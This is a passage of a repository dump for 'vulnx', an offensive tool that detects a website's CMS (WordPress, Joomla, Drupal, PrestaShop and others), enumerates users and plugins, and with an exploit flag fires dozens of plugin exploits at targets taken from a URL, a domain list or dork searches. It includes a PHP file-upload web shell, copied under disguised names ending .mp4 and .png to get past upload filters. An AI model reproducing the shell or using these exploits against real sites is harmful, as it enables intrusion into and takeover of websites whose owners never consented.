thumbnail-slider %s' %(que , failexploit)) -------------------------------------------------------------------------------- /modules/wpGrabber.py: -------------------------------------------------------------------------------- 1 | """ WordPress Information Gathering """ 2 | import re 3 | import requests 4 | from common.colors import B,W,G,good,bad 5 | 6 | #searching for the wordpress version 7 | def wp_version(url,headers,grabinfo): 8 | ep = url 9 | getversion = requests.get(ep,headers).text 10 | #searching version content from the http response. \d{:digit} version form 0.0.0 11 | matches = re.search(re.compile(r'content=\"WordPress (\d{0,9}.\d{0,9}.\d{0,9})?\"'),getversion) 12 | if matches: 13 | version = matches.group(1) 14 | return print (' %s Version : %s' %(good,version)) 15 | grabinfo.add('Version - '+ version) 16 | #searching for the wordpress themes 17 | def wp_themes(url,headers,grabinfo): 18 | ep = url 19 | themes_array = [] 20 | getthemes = requests.get(ep,headers).text 21 | matches = re.findall(re.compile(r'themes/(\w+)?/'),getthemes) 22 | #loop for matching themes.) 23 | if len(matches) > 0: 24 | for theme in matches: 25 | if theme not in themes_array: 26 | themes_array.append(theme) 27 | for i in range(len(themes_array)): 28 | print (' %s Themes : %s ' %(good , themes_array[i])) 29 | #searching for the wordpress user 30 | def wp_user(url,headers,grabinfo): 31 | ep = url + '/?author=1' 32 | getuser = requests.get(ep,headers).text 33 | matches = re.search(re.compile(r'author/(\w+)?/'),getuser) 34 | if matches: 35 | user = matches.group(1) 36 | return print (' %s User : %s' %(good,user)) 37 | grabinfo.add('user - '+ user) 38 | 39 | #searching for the wordpress plugins 40 | def wp_plugin(url,headers,grabinfo): 41 | plugins_array = [] 42 | ep = url 43 | getplugin = requests.get(ep,headers).text 44 | matches = re.findall(re.compile(r'wp-content/plugins/(\w+)?/'),getplugin) 45 | if len(matches) > 0: 46 | for plugin in matches: 47 | if plugin not in plugins_array: 48 | plugins_array.append(plugin) 49 | for i in range(len(plugins_array)): 50 | print (' %s Plugins : %s ' %(good , plugins_array[i])) 51 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | bs4 3 | -------------------------------------------------------------------------------- /shell/VulnX.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LulzSecToolkit/vulnx/d5b6fba86c0d316622ad1f12d11884bd85a7a7cb/shell/VulnX.gif -------------------------------------------------------------------------------- /shell/VulnX.html: -------------------------------------------------------------------------------- 1 | VulnX Uploading 2 | -------------------------------------------------------------------------------- /shell/VulnX.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Uname:".php_uname()."
"; 11 | echo ''; 12 | if(isset($_POST['Submit'])){ 13 | $filedir = ""; 14 | $maxfile = '2000000'; 15 | $mode = '0644'; 16 | $userfile_name = $_FILES['image']['name']; 17 | $userfile_tmp = $_FILES['image']['tmp_name']; 18 | if(isset($_FILES['image']['name'])) { 19 | $qx = $filedir.$userfile_name; 20 | @move_uploaded_file($userfile_tmp, $qx); 21 | @chmod ($qx, octdec($mode)); 22 | echo"
Uploaded Success ==> $userfile_name
"; 23 | } 24 | } 25 | else{ 26 | echo'
'; 27 | } 28 | echo '
'; 29 | 30 | } 31 | ?> -------------------------------------------------------------------------------- /shell/VulnX.php.mp4: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Uname:".php_uname()."
"; 11 | echo ''; 12 | if(isset($_POST['Submit'])){ 13 | $filedir = ""; 14 | $maxfile = '2000000'; 15 | $mode = '0644'; 16 | $userfile_name = $_FILES['image']['name']; 17 | $userfile_tmp = $_FILES['image']['tmp_name']; 18 | if(isset($_FILES['image']['name'])) { 19 | $qx = $filedir.$userfile_name; 20 | @move_uploaded_file($userfile_tmp, $qx); 21 | @chmod ($qx, octdec($mode)); 22 | echo"
Uploaded Success ==> $userfile_name
"; 23 | } 24 | } 25 | else{ 26 | echo'

'; 27 | } 28 | echo ''; 29 | 30 | } 31 | ?> -------------------------------------------------------------------------------- /shell/VulnX.php.png: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Uname:".php_uname()."
"; 11 | echo ''; 12 | if(isset($_POST['Submit'])){ 13 | $filedir = ""; 14 | $maxfile = '2000000'; 15 | $mode = '0644'; 16 | $userfile_name = $_FILES['image']['name']; 17 | $userfile_tmp = $_FILES['image']['tmp_name']; 18 | if(isset($_FILES['image']['name'])) { 19 | $qx = $filedir.$userfile_name; 20 | @move_uploaded_file($userfile_tmp, $qx); 21 | @chmod ($qx, octdec($mode)); 22 | echo"
Uploaded Success ==> $userfile_name
"; 23 | } 24 | } 25 | else{ 26 | echo'

'; 27 | } 28 | echo ''; 29 | 30 | } 31 | ?> -------------------------------------------------------------------------------- /shell/VulnX.txt: -------------------------------------------------------------------------------- 1 | Tig 2 | -------------------------------------------------------------------------------- /shell/VulnX.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LulzSecToolkit/vulnx/d5b6fba86c0d316622ad1f12d11884bd85a7a7cb/shell/VulnX.zip -------------------------------------------------------------------------------- /update.sh: -------------------------------------------------------------------------------- 1 | red = "\e[0;31m" 2 | green = "\e[0;32m" 3 | off = "\e[0m" 4 | function banner(){ 5 | echo -e "===== VULNX INSTALL =====" 6 | } 7 | function termuxOS() { 8 | echo -e "$red [$green+$red]$Cleaning Up Old Directories ..."; 9 | rm -r "/data/data/com.termux/files/usr/share/vulnx" 10 | echo -e "$red [$green+$red]$off Installing ..."; 11 | git clone https://github.com/anouarbensaad/vulnx "/data/data/com.termux/files/usr/share/vulnx"; 12 | rm -r "/data/data/com.termux/files/usr/share/vulnx/config" 13 | if [[ -d "/data/data/com.termux/files/usr/share/vulnx" ]]; then 14 | echo -e "$red [$green+$red]$off Tool Successfully Updated And Will Start In 5s!"; 15 | echo -e "$red [$green+$red]$off You can execute tool by typing vulnx" 16 | sleep 5; 17 | vulnx 18 | else 19 | echo -e "$red [$green✘$red]$off Tool Cannot Be Installed On Your System! Use It As Portable !"; 20 | exit 21 | fi 22 | } 23 | 24 | function debianOS() { 25 | echo -e "$red [$green+$red]$off Cleaning Up Old Directories ..."; 26 | sudo rm -r "/usr/share/vulnx" 27 | echo -e "$red [$green+$red]$off Installing ..."; 28 | sudo git clone https://github.com/anouarbensaad/vulnx "/usr/share/vulnx"; 29 | sudo rm -r "/usr/share/vulnx/config" 30 | if [[ -d "/usr/share/vulnx" ]]; then 31 | echo -e "$red [$green+$red]$off Tool Successfully Updated And Will Start In 5s!"; 32 | echo -e "$red [$green+$red]$off You can execute tool by typing vulnx"; 33 | sleep 5; 34 | vulnx 35 | else 36 | echo -e "$red [$green✘$red]$off Tool Cannot Be Installed On Your System! Use It As Portable !"; 37 | exit 38 | fi 39 | } 40 | if [[ -d "/data/data/com.termux/files/usr/" ]]; then 41 | banner 42 | echo -e "$red [$green+$red]$off vulnx Will Be Installed In Your System"; 43 | termuxOS 44 | elif [ -d "/usr/bin/" ];then 45 | banner 46 | echo -e "$red [$green+$red]$off vulnx Will Be Installed In Your System"; 47 | debianOS 48 | fi 49 | -------------------------------------------------------------------------------- /vulnx.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | The vulnx main part. 5 | Author: anouarbensaad 6 | Desc : CMS-Detector and Vulnerability Scanner & exploiter 7 | Copyright (c) 8 | See the file 'LICENSE' for copying permission 9 | """ 10 | 11 | from __future__ import print_function 12 | 13 | import sys 14 | import argparse 15 | import re 16 | import os 17 | import socket 18 | import common 19 | import warnings 20 | import signal 21 | import requests 22 | from common.threading import threads 23 | 24 | warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning) 25 | warnings.filterwarnings(action="ignore", category=DeprecationWarning) 26 | 27 | from common.colors import red, green, bg, G, R, W, Y, G , good , bad , run , info , end , que ,bannerblue2 28 | from common.banner import banner 29 | from common.uriParser import parsing_url as hostd 30 | from common.requestUp import random_UserAgent 31 | from common.output_wr import writelogs as outlogs 32 | 33 | ##### MODULES 34 | 35 | from modules.portChecker import portscan 36 | from modules.wpGrabber import (wp_version,wp_plugin,wp_themes,wp_user) 37 | from modules.jooGrabber import (joo_version,joo_user,joo_template) 38 | from modules.dnsLookup import dnsdumper , domain_info 39 | from modules.wpExploits import( wp_wysija, 40 | wp_blaze, 41 | wp_catpro, 42 | wp_cherry, 43 | wp_dm, 44 | wp_fromcraft, 45 | wp_jobmanager, 46 | wp_showbiz, 47 | wp_synoptic, 48 | wp_shop, 49 | wp_powerzoomer, 50 | wp_revslider, 51 | wp_adsmanager, 52 | wp_inboundiomarketing, 53 | wp_levoslideshow, 54 | wp_adblockblocker, 55 | ) 56 | from modules.jooExploits import( com_jce, 57 | com_media, 58 | # com_jdownloads, 59 | # com_jdownloadsb, 60 | com_fabrika, 61 | com_fabrikb, 62 | com_foxcontact, 63 | com_adsmanager, 64 | com_blog, 65 | com_users, 66 | comweblinks, 67 | mod_simplefileupload, 68 | com_jbcatalog, 69 | com_sexycontactform, 70 | com_rokdownloads, 71 | com_extplorer, 72 | com_jwallpapers, 73 | com_facileforms, 74 | ) 75 | from modules.prestaExploits import ( 76 | columnadverts, 77 | soopabanners, 78 | vtslide, 79 | simpleslideshow, 80 | productpageadverts, 81 | productpageadvertsb, 82 | jro_homepageadvertise, 83 | attributewizardpro, 84 | oneattributewizardpro, 85 | attributewizardpro_old, 86 | attributewizardpro_x, 87 | advancedslider, 88 | cartabandonmentpro, 89 | cartabandonmentpro_old, 90 | videostab, 91 | wg24themeadministration, 92 | fieldvmegamenu, 93 | wdoptionpanel, 94 | pk_flexmenu, 95 | nvn_export_orders, 96 | tdpsthemeoptionpanel, 97 | masseditproduct, 98 | 99 | ) 100 | 101 | #cleaning screen 102 | 103 | banner() 104 | 105 | def parser_error(errmsg): 106 | print("Usage: python " + sys.argv[0] + " [Options] use -h for help") 107 | print(R + "Error: " + errmsg + W) 108 | sys.exit() 109 | 110 | def parse_args(): 111 | parser = argparse.ArgumentParser(epilog='\tExample: \r\npython ' + sys.argv[0] + " -u google.com") 112 | parser.error = parser_error 113 | parser._optionals.title = "\nOPTIONS" 114 | parser.add_argument('-u', '--url', help="url target to scan") 115 | parser.add_argument('-D', '--dorks', help='search webs with dorks', dest='dorks' , type=str) 116 | parser.add_argument('-o', '--output', help='specify output directory',required=False) 117 | parser.add_argument('-t', '--timeout', help='http requests timeout', dest='timeout',type=float) 118 | parser.add_argument('-c', '--cms-info', help='search cms info[themes,plugins,user,version..]', dest='cms', choices=['user', 'themes','version','plugins','all']) 119 | parser.add_argument('--threads', help="number of threads", dest='numthread', type=float) 120 | parser.add_argument('-n', '--number-pages', help='search dorks number page limit', dest='numberpage' , type=int) 121 | parser.add_argument('-i', '--input', help='specify input file of domains to scan',dest='input_file' ,required=False) 122 | parser.add_argument('-l','--dork-list', help='list names of dorks exploits',dest='dorkslist', 123 | choices=['wordpress', 'prestashop','joomla','lokomedia','drupal','all']) 124 | parser.add_argument('-p', '--ports', help='ports to scan', 125 | dest='scanports', type=int) 126 | #Switches 127 | parser.add_argument('-e','--exploit', help='searching vulnerability & run exploits', 128 | dest='exploit', action='store_true') 129 | parser.add_argument('--it', help='interactive mode.', 130 | dest='cli', action='store_true') 131 | parser.add_argument('-w','--web-info', help='web informations gathering', 132 | dest='webinfo', action='store_true') 133 | parser.add_argument('-d','--domain-info', help='subdomains informations gathering', 134 | dest='domaininfo', action='store_true') 135 | parser.add_argument('--dns', help='dns informations gatherings', 136 | dest='dnsdump', action='store_true') 137 | 138 | return parser.parse_args() 139 | 140 | vulnresults = set() # results of vulnerability exploits. [success or failed] 141 | grabinfo = set() # return cms_detected the version , themes , plugins , user .. 142 | subdomains = set() # return subdomains & ip. 143 | hostinfo = set() # host info 144 | #args declaration 145 | args = parse_args() 146 | #url arg 147 | url = args.url 148 | #interactive arugment 149 | cli=args.cli 150 | #run exploit 151 | exploit = args.exploit 152 | #cms gathering args 153 | cms = args.cms 154 | # web hosting info 155 | webinfo = args.webinfo 156 | # domain info 157 | domaininfo = args.domaininfo 158 | # dorks search. 159 | dorks = args.dorks 160 | dorkslist = args.dorkslist 161 | # timeout 162 | timeout = args.timeout or 3 163 | #thread 164 | numthread = args.numthread or 1 165 | #numberpage 166 | numberpage = args.numberpage or 1 167 | #portscan 168 | scanports = args.scanports or 22 169 | #dns 170 | dnsdump = args.dnsdump 171 | #input_file 172 | input_file = args.input_file 173 | # Disable SSL related warnings 174 | warnings.filterwarnings('ignore') 175 | 176 | #method for cms detection 177 | def detect_cms(): 178 | lm = url + '/smiley/1.gif' 179 | lm_content = requests.get(lm,headers).text 180 | lm2 = url + '/rss.xml' 181 | lm2_content = requests.get(lm2,headers).text 182 | content=requests.get(url,headers).text 183 | # try: 184 | # joomla # 185 | #joomla searching content to detect. 186 | if re.search(re.compile(r'|/media/system/js/|com_content|Joomla!'), content): 187 | print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) 188 | print ('------------------------------------------------') 189 | print (' %s looking for cms' % (que)) 190 | print (' %s %sCMS :%s Joomla' % (good,W,end)) 191 | print ('------------------------------------------------') 192 | #webinfo gathering argument 193 | if webinfo: 194 | webhosting_info(hostinfo) 195 | 196 | #domain gatherinargument 197 | if domaininfo: 198 | print (' %s Starting searching for Subdomains' %(run)) 199 | domain_info(url) 200 | 201 | if cms == 'version': 202 | print (' %s CMS informations gathering' %(run)) 203 | joo_version(url,headers) 204 | print ("-----------------------------------------------") 205 | if cms == 'all': 206 | print (' %s CMS informations gathering' %(run)) 207 | joo_version(url,headers) 208 | joo_user(url,headers) 209 | joo_template(url,headers) 210 | print ("-----------------------------------------------") 211 | #port to scan 212 | if scanports: 213 | print (' %s Scanning Ports' %(run)) 214 | print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) 215 | portscan(hostd(url),scanports) 216 | print ("-----------------------------------------------") 217 | if dnsdump: 218 | print (' %s Starting DNS dump' %(run)) 219 | dnsdumper(url) 220 | print ("-----------------------------------------------") 221 | #joomla_exploits imported from folder[./common/joomla_exploits.py] 222 | if exploit: 223 | print (' %s Check Vulnerability' %(run)) 224 | print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) 225 | com_jce(url,headers) 226 | com_media(url,headers) 227 | #com_jdownloads(url,headers) 228 | # com_jdownloadsb(url,headers) 229 | com_fabrika(url,headers) 230 | com_fabrikb(url,headers) 231 | com_foxcontact(url,headers) 232 | com_adsmanager(url,headers) 233 | com_blog(url,headers) 234 | com_users(url,headers) 235 | comweblinks(url,headers) 236 | mod_simplefileupload(url,headers) 237 | com_jbcatalog(url,headers) 238 | com_sexycontactform(url,headers) 239 | com_rokdownloads(url,headers) 240 | com_extplorer(url,headers) 241 | com_jwallpapers(url,headers) 242 | com_facileforms(url,headers) 243 | 244 | # Wordpress # 245 | #wordpress searching content to detect. 246 | elif re.search(re.compile(r'wp-content|wordpress|xmlrpc.php'), content): 247 | print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) 248 | print ('------------------------------------------------') 249 | print (' %s looking for cms' % (que)) 250 | print (' %s %sCMS :%s Wordpress' % (good,W,end)) 251 | print ('------------------------------------------------') 252 | if webinfo: 253 | webhosting_info(hostinfo) 254 | if domaininfo: 255 | print (' %s Starting searching for Subdomains' %(run)) 256 | domain_info(url) 257 | #wp_grab methods info from (folder)[./common/grapwp.py] 258 | if cms == 'version': 259 | print (' %s CMS informations gathering' %(run)) 260 | wp_version(url,headers,grabinfo) 261 | print ("-----------------------------------------------") 262 | if cms == 'themes': 263 | print (' %s CMS informations gathering' %(run)) 264 | wp_themes(url,headers,grabinfo) 265 | print ("-----------------------------------------------") 266 | if cms == 'user': 267 | print (' %s CMS informations gathering' %(run)) 268 | wp_user(url,headers,grabinfo) 269 | print ("-----------------------------------------------") 270 | if cms == 'plugins': 271 | print (' %s CMS informations gathering' %(run)) 272 | wp_plugin(url,headers,grabinfo) 273 | print ("-----------------------------------------------") 274 | if cms == 'all': 275 | print (' %s CMS informations gathering' %(run)) 276 | wp_version(url,headers,grabinfo) 277 | wp_themes(url,headers,grabinfo) 278 | wp_user(url,headers,grabinfo) 279 | wp_plugin(url,headers,grabinfo) 280 | print ("-----------------------------------------------") 281 | #port to scan 282 | if scanports: 283 | print (' %s Scanning Ports' %(run)) 284 | print (""" %sPORTS %sSTATUS %sPROTO"""%(W,W,W)) 285 | portscan(hostd(url),scanports) 286 | print ("-----------------------------------------------") 287 | if dnsdump: 288 | print (' %s Starting DNS dump' %(run)) 289 | dnsdumper(url) 290 | print ("-----------------------------------------------") 291 | # vulnx -u http://example.com -e | vulnx -u http://example --exploit 292 | if exploit: 293 | print (' %s Check Vulnerability\n' %(run)) 294 | print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) 295 | #wp_exploit methods from (dolder)[./common/wp_exploits.py] 296 | wp_wysija(url,headers,vulnresults) 297 | wp_blaze(url,headers,vulnresults) 298 | wp_synoptic(url,headers,vulnresults) 299 | wp_catpro(url,headers,vulnresults) 300 | wp_cherry(url,headers,vulnresults) 301 | wp_dm(url,headers,vulnresults) 302 | wp_fromcraft(url,headers,vulnresults) 303 | wp_jobmanager(url,headers,vulnresults) 304 | wp_showbiz(url,headers,vulnresults) 305 | wp_shop(url,headers,vulnresults) 306 | wp_powerzoomer(url,headers,vulnresults) 307 | wp_revslider(url,headers,vulnresults) 308 | wp_adsmanager(url,headers,vulnresults) 309 | wp_inboundiomarketing(url,headers,vulnresults) 310 | wp_adblockblocker(url,headers,vulnresults) 311 | wp_levoslideshow(url,headers,vulnresults) 312 | print ("-----------------------------------------------") 313 | 314 | # Drupal # 315 | #drupal searching content to detect. 316 | elif re.search(re.compile(r'Drupal|drupal|sites/all|drupal.org'), content): 317 | print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) 318 | print ('------------------------------------------------') 319 | print (' %s looking for cms' % (que)) 320 | print (' %s CMS : Drupal' % (good)) 321 | print ('------------------------------------------------') 322 | if webinfo: 323 | webhosting_info(hostinfo) 324 | #domain gatherinargument 325 | if domaininfo: 326 | print (' %s Starting searching for Subdomains' %(run)) 327 | domain_info(url) 328 | if cms == 'version': 329 | print (' %s CMS informations gathering' %(run)) 330 | drupal_version() 331 | if scanports: 332 | print (' %s Scanning Ports\n' %(run)) 333 | print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) 334 | portscan(hostd(url),scanports) 335 | print ("-----------------------------------------------") 336 | if dnsdump: 337 | print (' %s Starting DNS dump ' %(run)) 338 | dnsdumper(url) 339 | print ("-----------------------------------------------") 340 | if exploit: 341 | print (' %s Check Vulnerability\n' %(run)) 342 | print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) 343 | 344 | # Prestashop # 345 | #prestashop searching content to detect. 346 | elif re.search(re.compile(r'Prestashop|prestashop'), content): 347 | print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) 348 | print ('------------------------------------------------') 349 | print (' %s looking for cms' % (que)) 350 | print (' %s %sCMS :%s Prestashop' % (good,W,end)) 351 | print ('------------------------------------------------') 352 | if webinfo: 353 | webhosting_info(hostinfo) 354 | #domain gatherinargument 355 | if domaininfo: 356 | print (' %s Starting searching for Subdomains' %(run)) 357 | domain_info(url) 358 | if cms == 'version': 359 | print (' %s CMS informations gathering' %(run)) 360 | prestashop_version() 361 | if scanports: 362 | print (' %s Scanning Ports\n' %(run)) 363 | print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) 364 | portscan(hostd(url),scanports) 365 | print ("-----------------------------------------------") 366 | if dnsdump: 367 | print (' %s Starting DNS dump ' %(run)) 368 | dnsdumper(url) 369 | print ("-----------------------------------------------") 370 | if exploit: 371 | print (' %s Check Vulnerability\n' %(run)) 372 | print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) 373 | columnadverts(url,headers) 374 | soopabanners(url,headers) 375 | vtslide(url,headers) 376 | simpleslideshow(url,headers) 377 | productpageadverts(url,headers) 378 | productpageadvertsb(url,headers) 379 | jro_homepageadvertise(url,headers) 380 | attributewizardpro(url,headers) 381 | oneattributewizardpro(url,headers) 382 | attributewizardpro_old(url,headers) 383 | attributewizardpro_x(url,headers) 384 | advancedslider(url,headers) 385 | cartabandonmentpro(url,headers) 386 | cartabandonmentpro_old(url,headers) 387 | videostab(url,headers) 388 | wg24themeadministration(url,headers) 389 | fieldvmegamenu(url,headers) 390 | wdoptionpanel(url,headers) 391 | pk_flexmenu(url,headers) 392 | nvn_export_orders(url,headers) 393 | tdpsthemeoptionpanel(url,headers) 394 | masseditproduct(url,headers) 395 | 396 | # OpenCart # 397 | #opencart searching content to detect. 398 | elif re.search(re.compile(r'route=product|OpenCart|route=common|catalog/view/theme'), content): 399 | print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) 400 | print ('------------------------------------------------') 401 | print (' %s looking for cms' % (que)) 402 | print (' %s CMS : OpenCart' % (good)) 403 | print ('------------------------------------------------') 404 | if webinfo: 405 | webhosting_info(hostinfo) 406 | #domain gatherinargument 407 | if domaininfo: 408 | print (' %s Starting searching for Subdomains' %(run)) 409 | domain_info(url) 410 | if cms == 'version': 411 | print (' %s CMS informations gathering' %(run)) 412 | if scanports: 413 | print (' %s Scanning Ports\n' %(run)) 414 | print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) 415 | portscan(hostd(url),scanports) 416 | print ("-----------------------------------------------") 417 | if dnsdump: 418 | print (' %s Starting DNS dump ' %(run)) 419 | dnsdumper(url) 420 | print ("-----------------------------------------------") 421 | if exploit: 422 | print (' %s Check Vulnerability\n' %(run)) 423 | print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) 424 | 425 | # Magento # 426 | #magento searching content to detect. 427 | elif re.search(re.compile(r'Log into Magento Admin Page|name=\"dummy\" id=\"dummy\"|Magento'), content): 428 | print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) 429 | print ('------------------------------------------------') 430 | print (' %s looking for cms' % (que)) 431 | print (' %s CMS : Magento' % (good)) 432 | print ('------------------------------------------------') 433 | if webinfo: 434 | webhosting_info(hostinfo) 435 | #domain gatherinargument 436 | if domaininfo: 437 | print (' %s Starting searching for Subdomains' %(run)) 438 | domain_info(url) 439 | if cms == 'version': 440 | print (' %s CMS informations gathering' %(run)) 441 | if scanports: 442 | print (' %s Scanning Ports\n' %(run)) 443 | print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) 444 | portscan(hostd(url),scanports) 445 | print ("-----------------------------------------------") 446 | if dnsdump: 447 | print (' %s Starting DNS dump ' %(run)) 448 | dnsdumper(url) 449 | print ("-----------------------------------------------") 450 | if exploit: 451 | print (' %s Check Vulnerability' %(run)) 452 | print (""" %sNAME %sSTATUS %sSHELL"""%(W,W,W)) 453 | 454 | # Lokomedia # 455 | #lokomedia searching content to detect. 456 | print (' %s Check Vulnerability' %(run)) 457 | elif re.search(re.compile(r'image/gif'), lm_content): 458 | print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) 459 | print ('------------------------------------------------') 460 | print (' %s looking for cms' % (que)) 461 | print (' %s CMS : Lokomedia' % (good)) 462 | print ('------------------------------------------------') 463 | if subdomains: 464 | print (' %s Starting searching for Subdomains' %(run)) 465 | domain_info(url) 466 | print ('------------------------------------------------') 467 | if scanports: 468 | print (' %s Scanning Ports\n' %(run)) 469 | print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) 470 | portscan(hostd(url),scanports) 471 | print ("-----------------------------------------------") 472 | if dnsdump: 473 | print (' %s Starting DNS dump ' %(run)) 474 | dnsdumper(url) 475 | print ("-----------------------------------------------") 476 | print (' %s Check Vulnerability' %(run)) 477 | elif re.search(re.compile(r'lokomedia'), lm2_content): 478 | print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) 479 | print ('------------------------------------------------') 480 | print (' %s looking for cms' % (que)) 481 | print (' %s CMS : Lokomedia' % (good)) 482 | print ('------------------------------------------------') 483 | if subdomains: 484 | print (' %s Starting searching for Subdomains' %(run)) 485 | domain_info(url) 486 | if scanports: 487 | print (' %s Scanning Ports\n' %(run)) 488 | print (""" %s PORTS %sSTATUS %sPROTO"""%(W,W,W)) 489 | portscan(hostd(url),scanports) 490 | print ("-----------------------------------------------") 491 | if dnsdump: 492 | print (' %s Starting DNS dump ' %(run)) 493 | dnsdumper(url) 494 | print ("-----------------------------------------------") 495 | print (' %s Check Vulnerability' %(run)) 496 | 497 | # Unknown # 498 | #no cms detect 499 | else: 500 | print ('\n %s[%sTarget%s]%s => %s%s \n '% (bannerblue2,W,bannerblue2, W, url, end)) 501 | print ('------------------------------------------------') 502 | print (' %s looking for cms' % (que)) 503 | print (' %s CMS : Unknown' % (bad)) 504 | print ('------------------------------------------------') 505 | if webinfo: 506 | webhosting_info(hostinfo) 507 | #domain gatherinargument 508 | if domaininfo: 509 | print (' %s Starting searching for Subdomains' %(run)) 510 | domain_info(url) 511 | print ("-----------------------------------------------") 512 | if dnsdump: 513 | print (' %s Starting DNS dump ' %(run)) 514 | dnsdumper(url) 515 | print ("-----------------------------------------------") 516 | # except Exception as e: 517 | # print ('%s\n\n error : %s%s' % (R,e,W)) 518 | 519 | # drupal Version 520 | def drupal_version(): 521 | response = requests.get(url,headers).text 522 | regex = 'Drupal \d{0,10}' 523 | regex = re.compile(regex) 524 | try: 525 | matches = regex.findall(response) 526 | if len(matches) > 0 and matches[0] != None and matches[0] != "": 527 | version = matches[0] 528 | print ('%s [+] Drupal Version : %s %s' %(G,version,W)) 529 | except Exception as error_: 530 | print('Handling Error : '+ str(error_)) 531 | 532 | # Prestashop Version 533 | def prestashop_version(): 534 | response = requests.get(url,headers).text 535 | regex = 'Prestashop \d{0,9}' 536 | regex = re.compile(regex) 537 | try: 538 | matches = regex.findall(response.text) 539 | if len(matches) > 0 and matches[0] != None and matches[0] != "": 540 | version = matches[0] 541 | return print ('%s [+] Prestashop Version : %s %s' %(G,version,W)) 542 | except Exception as error_: 543 | print('Handling Error : '+ str(error_)) 544 | 545 | # Web Hosting Information 546 | def webhosting_info(hostinfo): 547 | print (' %s Web Hosting Information' % (run)) 548 | urldate = "https://input.payapi.io/v1/api/fraud/domain/age/" + hostd(url) 549 | getinfo = requests.get(urldate,headers).text 550 | regex_date = r'Date: (.+?)-(.+?)' 551 | regex_date = re.compile(regex_date) 552 | matches = re.search(regex_date,getinfo) 553 | if matches: 554 | print ( ' %s Domain Created on : %s' % (good,matches.group(1))) 555 | try: 556 | ip = socket.gethostbyname(hostd(url)) 557 | print ( ' %s CloudFlare IP : %s' % (good,ip)) 558 | ipinfo = "http://ipinfo.io/" + ip + "/json" 559 | getipinfo = requests.get(ipinfo,headers).text 560 | country = re.search(re.compile(r'country\": \"(.+?)\"'),getipinfo) 561 | region = re.search(re.compile(r'region\": \"(.+?)\"'),getipinfo) 562 | latitude = re.search(re.compile(r'latitude: (.+?)'),getipinfo) 563 | longitude = re.search(re.compile(r'longitude\": \"(.+?)\"'),getipinfo) 564 | timezone = re.search(re.compile(r'timezone\": \"(.+?)\"'),getipinfo) 565 | ans = re.search(re.compile(r'ans\": \"(.+?)\"'),getipinfo) 566 | org = re.search(re.compile(r'org\": \"(.+?)\"'),getipinfo) 567 | if country: 568 | print(' %s Country : %s' % (good,country.group(1))) 569 | if region: 570 | print(' %s Region : %s' % (good,region.group(1))) 571 | if latitude: 572 | print(' %s Latitude : %s' % (good,latitude.group(1))) 573 | if longitude: 574 | print(' %s Longitude : %s' % (good,longitude.group(1))) 575 | if timezone: 576 | print(' %s Timezone : %s' % (good,timezone.group(1))) 577 | if ans: 578 | print(' %s Ans : %s' % (good,ans.group(1))) 579 | if org: 580 | print(' %s Org : %s' % (good,org.group(1))) 581 | print ("-----------------------------------------------") 582 | except Exception as parsing_error: 583 | print(' %s Parsing error : %s' % (bad , str(parsing_error))) 584 | # output 585 | output_dir = args.output or 'logs' 586 | 587 | if not os.path.exists(output_dir): # if the directory doesn't exist 588 | os.mkdir(output_dir) # create a new directory 589 | 590 | data = [ vulnresults, grabinfo, subdomains , hostinfo] 591 | 592 | data_names = ['vulnresults', 'grabinfo', 'subdomains' , 'hostinfo'] 593 | outlogs(data,data_names,output_dir) 594 | data = { 595 | 'vulnresults':list(vulnresults), 596 | 'grabinfo':list(grabinfo), 597 | 'subdomains':list(subdomains), 598 | } 599 | 600 | #clean 601 | def signal_handler(signal,frame): 602 | print("%s(ID: {}) Cleaning up...\n Exiting...".format(signal)%(W)) 603 | exit(0) 604 | signal.signal(signal.SIGINT, signal_handler) 605 | 606 | #main 607 | if __name__ == "__main__": 608 | 609 | if input_file: 610 | with open(input_file,'r') as urls: 611 | u_array = [url.strip('\n') for url in urls] 612 | try: 613 | for url in u_array: 614 | root = url 615 | #url condition entrypoint 616 | if root.startswith('http'): 617 | url = root 618 | else: 619 | url = 'http://'+root 620 | #default headers. 621 | headers = { 622 | 'User-Agent' : random_UserAgent(), 623 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 624 | 'Accept-Language': 'en-US,en;q=0.5', 625 | 'Connection': 'keep-alive', 626 | } 627 | detect_cms() 628 | urls.close() 629 | except Exception as error_: 630 | print('UKNOWN ERROR : '+ str(error_)) 631 | 632 | 633 | if url: 634 | #url condition entrypoint 635 | root = url 636 | if root.startswith('http'): 637 | url = root 638 | else: 639 | url = 'http://'+root 640 | #default headers. 641 | headers = { 642 | 'User-Agent' : random_UserAgent(), 643 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 644 | 'Accept-Language': 